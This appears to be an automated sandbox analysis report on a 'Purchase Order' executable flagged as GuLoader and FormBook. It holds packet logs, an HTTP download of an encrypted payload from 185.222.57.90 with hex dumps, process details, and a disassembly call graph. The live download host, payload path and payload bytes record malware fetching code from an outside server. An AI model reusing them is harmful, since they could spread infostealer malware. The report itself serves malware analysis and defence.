                                            Nov 18, 2024 18:11:17.863163948 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863218069 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863284111 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863300085 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863341093 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863341093 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863609076 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863620043 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863631010 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863651037 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863672972 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863697052 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.864363909 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.864387989 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.864398003 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.864413977 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.864434958 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.864459038 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.906606913 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.906646967 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.906658888 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.906833887 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.907042027 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.907102108 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.907291889 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.907319069 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.907361984 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.908052921 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.951765060 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.951864004 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.951869011 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.951908112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.987945080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988069057 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988151073 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988209009 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988215923 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988270044 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988563061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988599062 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988627911 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988636017 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988660097 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988688946 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989319086 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989355087 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989384890 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989392996 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989396095 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989428997 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989892006 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989945889 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989947081 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989983082 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989995956 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.990036011 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.990679979 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.990717888 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.990735054 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.990751028 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.990770102 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.990794897 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.023771048 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.023880005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.023902893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.023915052 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.023931980 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.023958921 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.024849892 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.024887085 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.024914980 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.024935961 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.126004934 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126051903 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126069069 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126127958 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.126168966 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.126533031 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126550913 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126566887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126590014 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.126622915 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.127219915 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127237082 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127254963 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127275944 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.127306938 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.127922058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127938986 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127962112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127980947 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.128011942 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.128668070 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.128689051 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.128705978 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.128716946 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.128724098 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.128746033 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.128779888 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143336058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143389940 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143404007 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143414974 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143456936 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143456936 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143758059 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143771887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143795967 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143809080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143815994 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143845081 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143846035 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143872976 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.144515038 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.144567966 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.252216101 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252237082 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252250910 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252264023 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252278090 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252290964 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252336025 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.252397060 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.252489090 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252504110 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252515078 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252562046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.252562046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.253124952 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253168106 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253180981 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253221035 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.253876925 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253894091 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253905058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253937960 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.253967047 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.254266024 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.254282951 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.254312992 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.254332066 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.254679918 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.254724979 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.258568048 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258585930 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258635998 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.258694887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258708954 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258722067 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258742094 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.258774042 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.259212971 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.259265900 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.259356022 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.259407043 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:54.993544102 CET4971180192.168.2.8185.222.57.90

                                            HTTP Request Dependency Graph

                                            • 185.222.57.90

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.849711185.222.57.90806892C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:11:15.523874044 CET175OUTGET /zFSrvbrRquo53.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: 185.222.57.90
                                            Cache-Control: no-cache
                                            Nov 18, 2024 18:11:16.708092928 CET1236INHTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Last-Modified: Sun, 17 Nov 2024 17:32:38 GMT
                                            Accept-Ranges: bytes
                                            ETag: "2aaa7eb21639db1:0"
                                            Server: Microsoft-IIS/10.0
                                            Date: Mon, 18 Nov 2024 17:11:16 GMT
                                            Content-Length: 290368
                                            Data Raw: 61 45 2e 53 76 ef e2 78 23 74 30 ca 69 b2 6f ce 27 99 69 64 03 42 74 3d c6 98 29 07 86 8c 60 83 95 67 6a 7f 8c 01 16 38 31 ee 02 02 2f 63 f7 d6 54 4d 16 7a d0 9b e5 8b b7 3f ff 0b d7 76 75 ac f8 b3 bc 2f 51 05 03 22 0c 24 56 eb 5c 3d 77 c0 1c 42 c0 41 45 a1 f3 c7 0d b3 a2 6f 07 1b 10 b1 a9 a3 40 c7 62 a5 b6 be 62 16 58 3b 73 72 07 85 fb 28 67 58 7f bc be da 47 20 c2 a1 64 04 87 1f 73 7c af e8 3a c6 af 4d 9f 06 83 9d 92 98 97 cf 26 3a a5 e5 07 05 cd a0 85 bd 45 b5 a4 75 16 91 22 08 0b 31 a1 9c 12 0a 02 4e 9d 6d ab 72 7f 3e ea 09 44 53 40 bd 28 9f 50 01 dc 69 23 29 3b d2 25 61 55 04 e3 08 17 7e 55 e3 39 4b 6d 90 c4 b1 51 3e ca 9e b0 4b a1 76 15 82 42 7f 83 82 8c 47 40 c7 fb a9 9a 0a 8f 7c f6 61 55 54 5c 25 8a 08 e5 8a 85 58 df 4b 7a 78 f2 00 f7 27 c7 48 7c 1b 6b 06 da 7d c8 21 73 bf f6 50 58 00 f9 2c e1 70 35 31 94 3e 9b 67 10 80 d6 7e c0 a2 31 1d 4d b0 f3 aa 72 7f 2f f3 ce db 86 b8 f5 82 d6 af a5 5d 3c 3a d4 5b bf bb 9b 32 8e 1f df b1 9e dc 1c 69 f4 aa 80 78 40 d5 95 19 cf 75 fa 38 34 ff 6a a0 bd df [TRUNCATED]
                                            Data Ascii: aE.Svx#t0io'idBt=)`gj81/cTMz?vu/Q"$V\=wBAEo@bbX;sr(gXG ds|:M&:Eu"1Nmr>DS@(Pi#);%aU~U9KmQ>KvBG@|aUT\%XKzx'H|k}!sPX,p51>g~1Mr/]<:[2ix@u84j$ <Tuwa[ND]zeh[Ds2d$XGD1PT1,:520]{x17zQh[dW7T^EUMGDqC0O^Bv;=3j<J6i,Z%]>&]y%FT)XIYw 2\7M(N[}-W)$]}D.p?3@5=<-PuR0}WuIAn6@~<.YU8g6~F]!lI4He1OW;~w6d1>3MA]c"b_=*pC(\l1yT<.C!.L<`+fYH>Scn@?bL2\N4kT+[xbswytI50Oexy]2}!z?d*|xiqE%d6KnDpao>][fU2'^rNU*e<N&Kcl|l7wNV
                                            Nov 18, 2024 18:11:16.708117962 CET1236INData Raw: 7f 36 e7 9c dc fa 5e 28 07 b5 19 5b 44 0f a1 59 19 c4 ea 4f af 10 06 90 cc 37 a5 ec c4 15 fa b9 78 23 48 ce 48 57 d5 20 c4 11 25 02 bc 6d c6 07 6a c0 78 b1 d4 84 aa 5b 27 62 e6 69 ca 87 d4 a7 f7 8e f1 e2 54 13 06 ae f2 8c bc 95 66 cf 27 2b 5a 0a
                                            Data Ascii: 6^([DYO7x#HHW %mjx['biTf'+Z[_2{[x{N3&S+*9 7lTT*Y3Mxz49|,@@#GT,Sb]D}Q/UOb|2uUVYM|2:-W}4"&.y|.gJ);PS%
                                            Nov 18, 2024 18:11:16.708144903 CET424INData Raw: a3 06 b2 a3 5d 7a 65 17 18 68 92 05 fa 95 af 5b 44 fc e5 73 32 85 1e 64 df 83 ee 99 d0 91 24 58 f0 ff cd 1d 47 44 31 50 54 31 84 e4 2c 3a 9f 35 e9 e1 32 e2 19 92 30 0f e3 8d 99 5d 98 17 7b 78 c2 d2 c4 31 81 ae 8a 37 7a 10 05 c9 f1 e8 51 dd 68 a1
                                            Data Ascii: ]zeh[Ds2d$XGD1PT1,:520]{x17zQh[dW7T^EUMGDqC0O^Bv;=3:8J6ip^%]>&]y%FT)XIYw 2\7M(N[}-W)$]}D.p?3
                                            Nov 18, 2024 18:11:16.708380938 CET1236INData Raw: 06 66 e1 bb 59 e0 93 b3 48 0f e5 d3 13 d4 af 3e db 53 63 6e 40 e3 3f 62 08 e3 fb 96 15 4c 32 d4 f6 5c 4e 34 e2 6b fe 54 8d 0a 19 2b 5b 04 78 d1 c7 b3 1f 0f 05 62 f9 8c e9 73 12 da f7 ec f5 77 9c a0 79 74 b5 49 e1 35 bc eb 30 4f 08 1f 65 80 ce e2
                                            Data Ascii: fYH>Scn@?bL2\N4kT+[xbswytI50Oexy]2}!z?d*|xiqE%d6KnDpao>][fU2'^rNU*e<N&Kcl|l7wNV6^([DYO7x#HHW %
                                            Nov 18, 2024 18:11:16.708395958 CET1236INData Raw: 4d ef 3d 2c 1e 87 66 20 36 6e b0 25 95 74 01 dc 69 23 29 3b d2 5c 60 5c a4 de 68 70 8d 68 83 5e b8 50 f0 a3 42 4b 98 62 6d 8a 2b c6 85 0f 24 e8 8c bf e2 eb b4 5a 61 50 5a a6 6a e8 8f a4 08 36 3c 61 45 ed fb e5 8a 85 58 df 4b 7a 78 a2 45 f7 27 8b
                                            Data Ascii: M=,f 6n%ti#);\`\hph^PBKbm+$ZaPZj6<aEXKzxE'I}|3n!sPX,q>0>;~1Mr/]<*[2ix@84j$"|uwa[ND]zeh[Ds2d$XGD1PT1
                                            Nov 18, 2024 18:11:16.708832979 CET424INData Raw: 1d dc 56 6c 97 49 c0 de e8 0e f0 37 88 e2 cd f4 fb 99 94 b7 21 b1 99 24 72 48 83 4f fc 85 c6 fc 8d e2 e4 6b b5 9c a8 60 f4 c1 6f cd 87 96 f6 99 fc 61 06 4e 14 b0 35 32 69 da 5a ae 10 cc 4b 88 81 f3 7f da 4f 3e ad 53 61 ef 5e 9d 2d 9e 4e 81 ea c5
                                            Data Ascii: VlI7!$rHOk`oaN52iZKO>Sa^-NwPb:)}t5]{qJ*J^]Ohqo2ZK1wIPb-9Imj[Fgm5HM[qw]Z$,UaqcUp]R<Sg4
                                            Nov 18, 2024 18:11:16.708849907 CET1236INData Raw: 6e 7e 79 61 f8 ed 43 13 6b f7 49 ab 32 01 3f c1 4c 32 1b 43 ce 59 58 5c 82 52 69 bf 9a 0c 30 e1 59 30 81 17 84 f5 7f 30 30 43 78 47 c0 19 25 bf 04 54 cc bc da d6 ca 11 c3 b4 b4 83 5d da c5 27 ec be 3d 6f 68 31 4d 3c e6 a0 f7 4c 14 14 31 b5 de 55
                                            Data Ascii: n~yaCkI2?L2CYX\Ri0Y000CxG%T]'=oh1M<L1UGY8lDi=XBY=&?[U-^/VI]^S`'Mlz470CAf}Wa@Z$AkREmujS'umlD(%AO%Bd%e6wsO{`iaI)G
                                            Nov 18, 2024 18:11:16.708863974 CET212INData Raw: b2 ee 21 d8 1a 43 99 49 86 8c a5 a5 8b c1 e8 85 75 b2 54 37 76 03 97 cd 93 82 05 17 27 45 06 9d f2 d4 b3 3b 50 8e 42 df e2 40 3c 7f 51 77 ff de 8f c3 3a 5d b2 da 93 f2 c9 55 ce ca 41 56 bf 11 3d 66 dd 2f 85 2e fb c1 28 91 86 13 83 92 33 9b bc 04
                                            Data Ascii: !CIuT7v'E;PB@<Qw:]UAV=f/.(3CL`FHl|0Tj~jn>h\_wE@02#X$p.^gcw-t+euaEYj5&WcgZvbe
                                            Nov 18, 2024 18:11:16.708877087 CET1236INData Raw: 89 7f 4c c5 49 f3 ae cb a3 99 24 3e 75 c4 c1 1f bd 89 26 50 db 5f 5e 19 88 76 99 34 c1 66 81 6b 49 de 93 00 27 79 f8 ff bc 55 59 03 da 5a 6a 7c 6f fd 84 76 9e 0a 80 b5 38 26 91 18 5a 00 d2 41 e0 e2 7a 4e ed db 35 03 0f 3b 04 bf 7b 89 27 8f fd fb
                                            Data Ascii: LI$>u&P_^v4fkI'yUYZj|ov8&ZAzN5;{'?k"D`'wvHyN~@Y-*!Ti*pSX@*_99'42yKLLZeLE[$=wJ?p/;jo>|MwVT y46I{#*9+5
                                            Nov 18, 2024 18:11:16.708892107 CET212INData Raw: f6 49 6b 12 7f 49 0f e5 9b 43 be ae 6f 33 16 75 6e 40 69 ef e9 4d f3 78 52 19 c4 67 2b c5 95 74 60 ea 6f 8a 53 cc 31 d6 5d ae ef 7c 17 82 4c 1f 84 48 f2 41 47 d1 73 12 60 f5 ec f5 77 a7 6a 76 3b 7f 01 94 cd 35 a6 a0 c4 45 eb e0 49 ba fc 2d 7e f4
                                            Data Ascii: IkICo3un@iMxRg+t`oS1]|LHAGs`wjv;5EI-~W]2&BIS>csZE<t66Dp3s/]G+(TaC'#4^l%_g,=;f:zwr40.$
                                            Nov 18, 2024 18:11:16.715008974 CET1236INData Raw: 29 4f 15 0c 17 83 22 d9 5e c0 4e ef 17 d4 00 bb f3 e1 89 26 57 54 17 ad c8 d4 25 02 bc 6d ed cf e1 03 53 70 a1 87 29 98 25 e3 1d 02 a0 87 d4 db 25 05 b4 f2 df 93 ca af f2 8c f4 ae 9e c0 a5 e3 a4 f5 a4 e6 ce 6e c2 7b e3 9b ac 7a fa b9 2e 30 29 e7
                                            Data Ascii: )O"^N&WT%mSp)%%n{z.0)hUV5HLTJwzu@P^xqr[NI@QPTh"b]}j%EJ6,$V7`g(=.!7LZ9Oks_mol+*2^F-q(ca$G1}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:12:10:08
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                            Imagebase:0x400000
                                            File size:724'333 bytes
                                            MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:12:11:05
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                            Imagebase:0x400000
                                            File size:724'333 bytes
                                            MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:22.2%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:20.7%
                                              Total number of Nodes:1536
                                              Total number of Limit Nodes:43
                                              execution_graph 3864 401941 3865 401943 3864->3865 3870 402c41 3865->3870 3871 402c4d 3870->3871 3915 4062dc 3871->3915 3874 401948 3876 4059cc 3874->3876 3957 405c97 3876->3957 3879 4059f4 DeleteFileW 3881 401951 3879->3881 3880 405a0b 3882 405b36 3880->3882 3971 4062ba lstrcpynW 3880->3971 3882->3881 4000 4065fd FindFirstFileW 3882->4000 3884 405a31 3885 405a44 3884->3885 3886 405a37 lstrcatW 3884->3886 3972 405bdb lstrlenW 3885->3972 3888 405a4a 3886->3888 3890 405a5a lstrcatW 3888->3890 3892 405a65 lstrlenW FindFirstFileW 3888->3892 3890->3892 3894 405b2b 3892->3894 3896 405a87 3892->3896 3893 405b54 4003 405b8f lstrlenW CharPrevW 3893->4003 3894->3882 3898 405b0e FindNextFileW 3896->3898 3908 4059cc 60 API calls 3896->3908 3910 405322 24 API calls 3896->3910 3976 4062ba lstrcpynW 3896->3976 3977 405984 3896->3977 3985 405322 3896->3985 3996 406080 MoveFileExW 3896->3996 3898->3896 3902 405b24 FindClose 3898->3902 3899 405984 5 API calls 3901 405b66 3899->3901 3903 405b80 3901->3903 3904 405b6a 3901->3904 3902->3894 3905 405322 24 API calls 3903->3905 3904->3881 3907 405322 24 API calls 3904->3907 3905->3881 3909 405b77 3907->3909 3908->3896 3911 406080 36 API calls 3909->3911 3910->3898 3913 405b7e 3911->3913 3913->3881 3931 4062e9 3915->3931 3916 406534 3917 402c6e 3916->3917 3948 4062ba lstrcpynW 3916->3948 3917->3874 3932 40654e 3917->3932 3919 406502 lstrlenW 3919->3931 3921 4062dc 10 API calls 3921->3919 3924 406417 GetSystemDirectoryW 3924->3931 3925 40642a GetWindowsDirectoryW 3925->3931 3926 40654e 5 API calls 3926->3931 3927 4062dc 10 API calls 3927->3931 3928 4064a5 lstrcatW 3928->3931 3929 40645e SHGetSpecialFolderLocation 3930 406476 SHGetPathFromIDListW CoTaskMemFree 3929->3930 3929->3931 3930->3931 3931->3916 3931->3919 3931->3921 3931->3924 3931->3925 3931->3926 3931->3927 3931->3928 3931->3929 3941 406188 3931->3941 3946 406201 wsprintfW 3931->3946 3947 4062ba lstrcpynW 3931->3947 3939 40655b 3932->3939 3933 4065d6 CharPrevW 3936 4065d1 3933->3936 3934 4065c4 CharNextW 3934->3936 3934->3939 3936->3933 3937 4065f7 3936->3937 3937->3874 3938 4065b0 CharNextW 3938->3939 3939->3934 3939->3936 3939->3938 3940 4065bf CharNextW 3939->3940 3953 405bbc 3939->3953 3940->3934 3949 406127 3941->3949 3944 4061ec 3944->3931 3945 4061bc RegQueryValueExW RegCloseKey 3945->3944 3946->3931 3947->3931 3948->3917 3950 406136 3949->3950 3951 40613a 3950->3951 3952 40613f RegOpenKeyExW 3950->3952 3951->3944 3951->3945 3952->3951 3954 405bc2 3953->3954 3955 405bd8 3954->3955 3956 405bc9 CharNextW 3954->3956 3955->3939 3956->3954 4006 4062ba lstrcpynW 3957->4006 3959 405ca8 4007 405c3a CharNextW CharNextW 3959->4007 3962 4059ec 3962->3879 3962->3880 3963 40654e 5 API calls 3968 405cbe 3963->3968 3964 405cef lstrlenW 3965 405cfa 3964->3965 3964->3968 3966 405b8f 3 API calls 3965->3966 3969 405cff GetFileAttributesW 3966->3969 3967 4065fd 2 API calls 3967->3968 3968->3962 3968->3964 3968->3967 3970 405bdb 2 API calls 3968->3970 3969->3962 3970->3964 3971->3884 3973 405be9 3972->3973 3974 405bfb 3973->3974 3975 405bef CharPrevW 3973->3975 3974->3888 3975->3973 3975->3974 3976->3896 4013 405d8b GetFileAttributesW 3977->4013 3980 4059b1 3980->3896 3981 4059a7 DeleteFileW 3983 4059ad 3981->3983 3982 40599f RemoveDirectoryW 3982->3983 3983->3980 3984 4059bd SetFileAttributesW 3983->3984 3984->3980 3986 40533d 3985->3986 3995 4053df 3985->3995 3987 405359 lstrlenW 3986->3987 3988 4062dc 17 API calls 3986->3988 3989 405382 3987->3989 3990 405367 lstrlenW 3987->3990 3988->3987 3992 405395 3989->3992 3993 405388 SetWindowTextW 3989->3993 3991 405379 lstrcatW 3990->3991 3990->3995 3991->3989 3994 40539b SendMessageW SendMessageW SendMessageW 3992->3994 3992->3995 3993->3992 3994->3995 3995->3896 3997 406094 3996->3997 3999 4060a1 3996->3999 4016 405f06 3997->4016 3999->3896 4001 406613 FindClose 4000->4001 4002 405b50 4000->4002 4001->4002 4002->3881 4002->3893 4004 405b5a 